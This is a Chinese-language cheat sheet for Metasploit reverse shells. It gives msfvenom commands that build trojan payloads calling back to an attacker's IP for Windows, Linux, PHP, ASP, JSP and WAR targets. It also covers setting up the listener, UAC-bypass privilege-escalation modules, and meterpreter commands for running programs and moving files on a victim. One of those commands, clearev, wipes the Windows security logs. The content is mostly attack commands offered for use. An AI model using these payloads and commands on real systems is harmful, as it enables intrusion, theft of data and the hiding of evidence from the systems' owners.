MSFのreverse_tcp反向连接

msf生成linux木马文件命令

生成木马文件

Windows：
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名

Linux:
msfvenom -p linux/x86(x64)/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名

PHP:
msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.php

ASP:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp

JSP:
msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jsp

WAR:
msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war

配置、监听、执行

msf6 > use exploit/multi/handler     #使用监听模块
set payload linux/x64/meterpreter/reverse_tcp     #使用和木马相同的payload
set lhost 1xx.xx.xx.xx #kali 的ip
set lport 4444 #木马的端口

提权

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

MSF命令大全

sessions    #sessions –h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
background  #将当前会话放置后台
run  #执行已有的模块，输入run后按两下tab，列出已有的脚本
info #查看已有模块信息
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell
日志清除
>clearev  #清除windows中的应用程序日志、系统日志、安全日志
upload file #向目标主机上传文件，例如：upload /root/1.txt d:\1.txt
download file #从目标主机下载文件，例如：download d:\1.txt /root/1.txt
search #在目标主机上搜索文件search -f *test*
execute #在目标主机执行程序execute -H -i -f cmd.exe
getsystem #提权

解决获得shell后乱码问题

chcp 65001